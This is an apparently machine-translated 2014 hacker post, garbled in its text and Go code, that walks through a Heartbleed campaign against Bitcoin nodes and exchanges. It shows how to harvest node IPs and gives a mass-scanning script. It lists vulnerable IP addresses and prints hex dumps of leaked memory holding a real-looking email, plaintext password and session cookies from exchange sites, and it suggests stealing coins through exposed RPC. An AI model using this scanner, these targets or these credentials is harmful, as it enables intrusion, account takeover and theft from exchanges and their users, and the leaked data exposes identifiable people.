Google Translate:
...
Steps are as follows:
1 find various bits coins, currency cottage client IP address, find a specific port that opens SSL
Get installed bitcoin client ip of two ways:
1 download a qt-bitcoin client, open debug.log , ok collect inside IP right
2014-04-21 01:53:27 init message: loading is complete
2014-04-21 01:53:27 Initialization result: 1
2014-04-21 01:53:28 ERROR: GetMyExternalIP (): connection closed
2014-04-21 01:53:28 receive version message: / Satoshi: 0.8.5 /: version 70001, blocks = 296904, us = 219.147.23.114:1650, them = 58.64.155.69:8333, peer = 58.64.155.69 : 8333
2014-04-21 01:53:28 Added time data, samples 2, offset -6 (+0 minutes)
2014-04-21 01:53:33 ERROR: GetMyExternalIP (): connection to 74.208.43.192:80 failed
2014-04-21 01:53:35 receive version message: / Satoshi: 0.8.2.2 /: version 70001, blocks = 296904, us = 219.147.23.114:1657, them = 192.155.81.62:8333, peer = 192.155.81.62 : 8333
2014-04-21 01:53:35 Added time data, samples 3, offset -13 (+0 minutes)
2014-04-21 01:53:35 No valid UPnP IGDs found
2014-04-21 01:53:35 upnp thread exit
2014-04-21 01:53:36 receive version message: / Satoshi: 0.8.5 /: version 70001, blocks = 296904, us = 219.147.23.114:1659, them = 194.71.109.94:8333, peer = 194.71.109.94 : 8333
2014-04-21 01:53:36 Added time data, samples 4, offset +12 (+0 minutes)
2014-04-21 01:53:36 socket recv error 10054
2014-04-21 01:53:41 ERROR: GetMyExternalIP (): connection closed
2014-04-21 01:53:48 receive version message: / Satoshi: 0.9.99 /: version 70002, blocks = 296904, us = 219.147.23.114:1680, them = 71.13.251.162:8333, peer = 71.13.251.162 : 8333
2014-04-21 01:53:48 Added time data, samples 5, offset -12 (+0 minutes)
2014-04-21 01:53:48 nTimeOffset = -6 (+0 minutes)
2014-04-21 01:53:48 ERROR: GetMyExternalIP (): connection to 212.117.175.194:80 failed
2014-04-21 01:53:48 ext-ip thread exit
2014-04-21 01:53:49 receive version message: / Satoshi: 0.9.1 /: version 70002, blocks = 296904, us = 219.147.23.114:1681, them = 68.151.120.205:8333, peer = 68.151.120.205 : 8333
2014-04-21 01:53:49 Added time data, samples 6, offset -13 (+0 minutes)
2014-04-21 01:53:50 receive version message: / Satoshi: 0.9.0 /: version 70002, blocks = 296904, us = 219.147.23.114:1682, them = 88.178.92.109:8333, peer = 88.178.92.109 : 8333
2014-04-21 01:53:50 Added time data, samples 7, offset -12 (+0 minutes)
2014-04-21 01:53:50 nTimeOffset = -12 (+0 minutes)
Look at these IP right, gather next
2 Use blockchain , this can cause huge point, opening
https://blockchain.info/zh-cn/connected-nodesNot only know the IP, and intuitively know the client version used for those versions vulnerable, silent, huh. .
file:///C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ksohtml\wps_clip_image-28929.png
3 write a small crawler, automated constantly crawl the IP , save it as a NG file format is as follows , do not ask me to code. . .
Their play to
193.109.68.62
212.3.147.37
Xxx
Yyy
. . . .
4 Improved bleed procedures through the entire document, well, to the point code
func readLines (path string) ([] string, error) {
file, err: = os.Open (path)
if err! = nil {
return nil, err
}
defer file.Close ()
var lines [] string
scanner: = bufio.NewScanner (file)
for scanner.Scan () {
lines = append (lines, scanner.Text ())
}
return lines, scanner.Err ()
}
/ / Writes the lines to the given file.
func writeLines (lines [] string, path string, skipline int) error {
file, err: = os.Create (path)
if err! = nil {
return err
}
defer file.Close ()
w: = bufio.NewWriter (file)
for i, line: = range lines {
if i continue
}
fmt.Fprintln (w, line)
}
return w.Flush ()
}
func main () {
var tgt bleed.Target
flag.StringVar (& tgt.StartTls, "starttls", "", "use STARTTLS")
flag.Parse ()
if flag.NArg () <1 {
usage (os.Args [0])
}
readLines, _: = readLines ("ip.txt")
tgt.HostIp = flag.Arg (0)
u, err: = url.Parse (tgt.HostIp)
if err == nil && u.Host! = "" {
tgt.HostIp = u.Host
}
var Lines [] string
out, err: = bleed.Heartbleed (& tgt, [] byte ("xxx"))
if err == bleed.Safe {
/ / Log.Printf ("% v - SAFE", tgt.HostIp)
/ / Os.Exit (0)
} Else if err! = Nil {
/ / Log.Printf ("% v - ERROR:% v", tgt.HostIp, err)
/ / Os.Exit (2)
} Else {
log.Printf ("% v \ n", string (out))
log.Printf ("% v - VULNERABLE", tgt.HostIp)
/ / Os.Exit (1)
}
for _, v: = range readLines {
tgt.HostIp = v
u, err: = url.Parse (tgt.HostIp)
if err == nil && u.Host! = "" {
tgt.HostIp = u.Host
}
out, err: = bleed.Heartbleed (& tgt, [] byte ("xxx"))
if err == bleed.Safe {
/ / Log.Printf ("% v - SAFE", tgt.HostIp)
/ / Os.Exit (0)
} Else if err! = Nil {
/ / Log.Printf ("% v - ERROR:% v", tgt.HostIp, err)
/ / Os.Exit (2)
} Else {
log.Printf ("% v \ n", string (out))
log.Printf ("% v - VULNERABLE", tgt.HostIp)
Lines = append (Lines, tgt.HostIp)
/ / Os.Exit (1)
}
}
writeLines (Lines, "vv.txt", 0)
}
vv.txt results, these IP443 minute of being explosive, the way to find a cottage exchange.
193.109.68.62
212.3.147.37
149.210.135.59
68.12.220.61
198.154.110.58
5.9.121.236
71.232.19.139
77.37.140.232
212.83.51.80
76.27.96.38
46.234.101.56
46.4.106.47
106.187.43.55
98.247.44.48
46.10.210.17
108.181.196.19
103.16.26.78
............
Above these IP directly explosion. .
Key breakthroughs:
Just test one:
Password out. . . Good risk. . .
. Email = |
00000220 6b 79 6e 65 70 25 34 30 6d 61 69 6c 2e 72 75 26 | kynep% 40mail.ru & |
00000230 70 61 73 73 3d 66 4f 36 33 59 6a 67 5a 73 53 26 | pass = fO63YjgZsS & |
Heartbleed.exe 106.187.43.55
2014/04/11 15:47:25 ([] uint8) {
00000000 02 08 1c 67 69 74 68 75 62 2e 63 6f 6d 2f 70 68 | ...github.com / ph |
00000010 69 6c 73 6f 6e 67 2f 62 74 63 72 6f 62 6f 74 42 | ilsong / btcrobotB |
00000020 54 43 52 4f 42 4f 54 20 4c 54 43 44 4f 47 47 82 | TCROBOT LTCDOGG. |
00000030 24 25 e6 d1 1a 2e 50 68 30 9b 8d a9 25 72 ea 16 | $% .... Ph0 ...% r .. |
00000040 5e 0b 49 3d cc cb 29 a6 95 90 f6 61 57 b3 2f ec |. ^ I = ..) .... aW /.. |
00000050 64 83 d0 9d f4 90 a0 75 b0 f6 27 f0 00 22 45 fc | d ...... u .. '.. "E. |
00000060 f7 9a 9c 67 58 af 66 51 9b f3 9b 82 01 06 cb 31 | ... gX.fQ. ...... 1 |
00000070 21 c1 3c 77 a0 f7 16 f2 9f a6 41 3f 23 7c 35 4a |!. 00000080 5a 87 29 b3 64 7d 97 19 07 5d 07 16 d5 4c 25 9b |. Z.) d} ...] ... L%. |
00000090 b7 d6 79 6b 54 c0 74 ef 14 de 78 db 15 5a 35 17 | .. ykT.t. .. x .. Z5. |
000000a0 1b ce 4e 05 b1 9f 56 e8 ca 04 27 44 dd e3 b6 33 | .. N. .. V. .. 'D. .. 3 |
. 000000b0 df 48 b3 4b f4 de 7c 46 5f a4 10 4f 2a 3a 90 f6 | HK | F_ .. O *:. .. |
000000c0 96 78 14 56 ae 17 97 a0 78 54 70 08 d7 a9 2b ab |. XV ... xTp ... +. |
000000d0 8e 0f 9e 89 17 25 21 0e 07 ca 28 a7 8b c5 c6 df | .....% ... (.....! |
000000e0 3a 5b fa cd e7 55 be bd 65 61 a7 c9 6e 47 ac 0c |: [... U. ea .. nG .. |.
000000f0 C6 C6 0a 7b 8a c4 43 40 D0 1E b7 d9 69 67 ba 01 | .. { C. .. @ .... IG .. |
00000100 2a 30 ba 10 2c 6e 4f 8c 18 ab d0 13 37 f5 72 13 | * 0 .., nO ..... 7.r. |
00000110 da 14 e7 b6 44 43 01 94 ba 3b 2d 41 ab 97 55 9b | .... DC ...;-A .. U. |
00000120 3d 0c fb 6c 38 ca b9 61 93 99 1d 45 71 61 7d 5a | = .. l8 .. a ... Eqa} Z |
00000130 be a8 76 dd ba e8 54 8f 1a 3d 0a 24 93 98 7b 67 | .. v ... T. = $ .. {g.. |
00000140 c7 7b ce 37 62 87 e3 b0 4a b2 f3 f7 63 67 73 86 |. {.7 B ... J. .. cgs. |
00000150 88 8c 55 32 06 d0 b1 a1 0e 9f 9f 97 b4 e9 82 26 | .. U2 ........... & |
00000160 b7 f8 65 36 2e dc 1c 76 6d 98 ee 2a 3d 0d 00 01 | .. e6 ... vm .. * = ... |
00000170 10 b5 ed e0 bc 0b 46 43 5f f0 de f6 7c 4b 76 a2 | ...... FC_ ... | Kv. |
00000180 0d a4 73 a2 d5 39 1e 4f 66 51 b9 8f d4 d3 b0 c5 | .. s .. 9.OfQ ...... |
00000190 c6 d2 cc 4d 8b cd 6f 96 c2 f3 87 ff 95 f7 95 8b |. ... M. o ......... |
000001a0 23 d4 05 1d 44 5d dc 89 e6 24 94 85 55 28 5b 5c | # ... D] ... $ .. U ([\ |
000001b0 a2 14 2f b1 22 f5 b0 ca ac ab 04 61 a4 58 f4 df | .. / "...... aX.. |
000001c0 8e 63 de 9c 31 7b df eb 85 ba c7 14 d9 3e 31 67 |. C .. 1 {.......> 1g |
000001d0 34 47 8a 77 2c d2 0e 90 7c e6 78 96 58 b9 2b 33 | 4G.w, ... |. XX +3 |
000001e0 cc 4a 45 6d d5 07 9f ac 68 21 5f d8 c3 72 db a1 |. JEm .... h _ .. r ..! |
000001f0 2b be c2 38 39 39 88 4a 50 b4 56 5f d5 a8 ef 9d | + .. 899.JP.V_. ... |
00000200 50 d3 ba 48 9a ac 6f 6e 74 72 6f 6c 3a 20 6e 6f | P. H. ontrol:.. No |
00000210 2d 63 61 63 68 65 0d 0a 0d 0a 65 6d 61 69 6c 3d |-cache .... email = |
00000220 6b 79 6e 65 70 25 34 30 6d 61 69 6c 2e 72 75 26 | kynep% 40mail.ru & |
00000230 70 61 73 73 3d 66 4f 36 33 59 6a 67 5a 73 53 26 | pass = fO63YjgZsS & |
00000240 72 65 6d 65 6d 62 65 72 2d 6d 65 3d 66 61 6c 73 | remember-me = fals |
00000250 65 7d eb 38 49 ab 9c 66 16 70 eb 9c a6 89 47 0a |. E} .8 I. fp ... G. |
00000260 35 8c 22 67 8d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a |. 5 "g ............ |
00000270 74 65 78 74 2f 63 73 73 2c 2a 2f 2a 3b 71 3d 30 | text / css, * / *; q = 0 |
00000280 2e 31 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 | .1 .. Accept-Langu |
00000290 61 67 65 3a 20 65 6e 2d 75 73 2c 65 6e 3b 71 3d | age: en-us, en; q = |
000002a0 30 2e 35 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f | 0.5 .. Accept-Enco |
000002b0 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c | ding: gzip, defl |
000002c0 61 74 65 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 | ate .. Referer: ht |
000002d0 74 70 73 3a 2f 2f 62 74 63 64 65 61 6c 2e 69 6f | tps :/ / btcdeal.io |
000002e0 2f 69 6e 64 65 78 2e 68 74 6d 0d 0a 43 6f 6f 6b | / index.htm .. Cook |
000002f0 69 65 3a 20 63 6f 6e 6e 65 63 74 2e 73 69 64 3d | ie: connect.sid = |
00000300 73 25 33 41 44 4e 30 5a 39 69 57 65 48 30 47 6c | s% 3ADN0Z9iWeH0Gl |
00000310 64 6c 35 67 73 39 44 5a 62 6b 6b 51 2e 4d 57 7a | dl5gs9DZbkkQ.MWz |
00000320 57 68 6f 63 42 4c 37 4b 54 64 62 65 7a 6c 66 52 | WhocBL7KTdbezlfR |
00000330 72 47 31 53 75 31 52 58 39 63 53 44 74 73 6c 62 | rG1Su1RX9cSDtslb |
00000340 65 63 71 50 55 33 65 67 0d 0a 43 6f 6e 6e 65 63 | ecqPU3eg .. Connec |
00000350 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 | tion: keep-alive |
00000360 0d 0a 49 66 2d 4d 6f 64 69 66 69 65 64 2d 53 69 | .. If-Modified-Si |
00000370 6e 63 65 3a 20 4d 6f 6e 2c 20 31 37 20 46 65 62 | nce: Mon, 17 Feb |
00000380 20 32 30 31 34 20 31 35 3a 33 30 3a 31 38 20 47 | 2014 15:30:18 G |
00000390 4d 54 0d 0a 49 66 2d 4e 6f 6e 65 2d 4d 61 74 63 | MT .. If-None-Matc |
000003a0 68 3a 20 22 31 34 31 31 2d 31 33 39 32 36 35 31 | h: "1411-1392651 |
000003b0 30 31 38 30 30 30 22 0d 0a 0d 0a 47 45 54 20 2f | 018000 ".... GET / |
000003c0 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 | css / bootstrap.mi |
000003d0 6e 2e 63 73 73 20 48 54 54 50 2f 31 2e 31 0d 0a | n.css HTTP/1.1 .. |
000003e0 48 6f 73 74 3a 20 62 74 63 64 65 61 6c 2e 69 6f | Host: btcdeal.io |
000003f0 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f | .. User-Agent: Mo |
00000400 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f | zilla/5.0 (Windo |
00000410 77 73 20 4e 54 20 36 2e 31 3b 20 72 76 3a 32 34 | ws NT 6.1; rv: 24 |
00000420 2e 30 29 20 47 65 63 6b 6f 2f 32 30 31 30 30 31 | .0) Gecko/201001 |
00000430 30 31 20 46 69 72 65 66 6f 78 2f 32 34 2e 30 0d | 01 Firefox/24.0. |
00000440 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 63 73 | Accept:. Text / cs |
00000450 73 2c 2a 2f 2a 3b 71 3d 30 2e 31 0d 0a 41 63 63 | s, * / *; q = 0.1 .. Acc |
00000460 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e | ept-Language: en |
00000470 2d 75 73 2c 65 6e 3b 71 3d 30 2e 35 0d 0a 41 63 |-us, en; q = 0.5 .. Ac |
00000480 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 | cept-Encoding: g |
00000490 7a 69 70 2c 20 64 65 66 6c 61 74 65 0d 0a 52 65 | zip, deflate .. Re |
000004a0 66 65 72 65 72 3a 20 68 74 74 70 73 3a 2f 2f 62 | ferer: https://b |
000004b0 74 63 64 65 61 6c 2e 69 6f 2f 69 6e 64 65 78 2e | tcdeal.io / index. |
000004c0 68 74 6d 0d 0a 43 6f 6f 6b 69 65 3a 20 63 6f 6e | htm .. Cookie: con |
000004d0 6e 65 63 74 2e 73 69 64 3d 73 25 33 41 44 4e 30 | nect.sid = s% 3ADN0 |
000004e0 5a 39 69 57 65 48 30 47 6c 64 6c 35 67 73 39 44 | Z9iWeH0Gldl5gs9D |
000004f0 5a 62 6b 6b 51 2e 4d 57 7a 57 68 6f 63 42 4c 37 | ZbkkQ.MWzWhocBL7 |
00000500 4b 54 64 62 65 7a 6c 66 52 72 47 31 53 75 31 52 | KTdbezlfRrG1Su1R |
00000510 58 39 63 53 44 74 73 6c 62 65 63 71 50 55 33 65 | X9cSDtslbecqPU3e |
00000520 67 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b | g .. Connection: k |
00000530 65 65 70 2d 61 6c 69 76 65 0d 0a 49 66 2d 4d 6f | eep-alive .. If-Mo |
00000540 64 69 66 69 65 64 2d 53 69 6e 63 65 3a 20 54 68 | dified-Since: Th |
00000550 75 2c 20 32 30 20 46 65 62 20 32 30 31 34 20 31 | u, 20 Feb 2014 1 |
00000560 31 3a 35 31 3a 35 31 20 47 4d 54 0d 0a 49 66 2d | 1:51:51 GMT .. If-|
00000570 4e 6f 6e 65 2d 4d 61 74 63 68 3a 20 22 38 31 39 | None-Match: "819 |
00000580 32 32 2d 31 33 39 32 38 39 37 31 31 31 30 30 30 | 22-1392897111000 |
00000590 22 0d 0a 0d 0a 54 22 69 47 b6 49 55 b9 4c d7 c3 | ".... T" iG.IU.L.. |
000005a0 22 ad 6f 17 cf 5a e3 c3 86 06 06 06 06 06 06 06 |. "O .. Z. ......... |
000005b0 20 22 31 34 31 31 2d 31 33 39 32 36 35 31 30 31 | "1411-139265101 |
000005c0 38 30 30 30 22 0d 0a 43 61 63 68 65 2d 43 6f 6e | 8000 ".. Cache-Con |
000005d0 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d | trol: max-age = 0 |.
000005e0 0a 0d 0a 2a 29 13 10 22 a6 ea b4 c2 f8 79 2a 58 | ... *) .. "..... y * X |
000005f0 04 f9 79 64 28 95 e3 08 08 08 08 08 08 08 08 08 | .. yd (........... |
00000600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ |
Again a sessionid
|: XMLHttpRequest |
| .. Referer: https |
| :/ / 5.9.121.236 / l |
| Ocalbitcoins / pro |
| D-cactus/..Cooki |
| E: csrftoken = hij |
| ChiSccRjRQVOu6ki |
| MkPZFPp93IAiT; s |
|. Essionid = "eJxrY |
| KotZNSI4GJgYChJL |
| S5Jzs_PzkyNYANyy |
| _OLslNTQnnjE0tLM |
| UJLi1OL4jNTvJlDh |
| ZAEkhKTs1PzUkKVi |
| LPzSooq9UpLMnOK9 |
| UDyeq65iZk5jkCWE |
| 1QNV3FJUWpibnF-U |
| UkhUyhLSmJJaiFzq |
| R4A6bYsxw: 1WW4vC |
|: YWAwBljNKntjyLf |
| QLXhVNBVrncE ".. C |
| Onnection: keep-|
| Alive .. If-Modifi |
| Ed-Since: Fri, 1 |
| 1 Apr 2014 10:35 |
|: 05 GMT ........; |
| `...... ~ 9D .. X. .. |
https://5.9.121.236/login/If 443, if it is a server, I rely on you regularly collect it, pattern matching. . . . Bypass to the other, web springboard, and the like. . .
If ssl + rpc, broken rpc, if not set the wallet password, and then send a command transfer bitcoins, oh, my god ... bitcoins are so cottage currency Needless to say, if there is 443 vulnerabilities of Minutes still be engaged. . . heartbleed bitcoin client to attack, in the case of open rpc protocol, using ssl certification, can be attacked. This is the vast majority of the server program will open options. Individual users should not panic. . . . Well, not much to say, and you figure it out, and quickly upgrade it, rose no harm! ! ! ! The key is to site users, exchanges, router port mapping is also careful. .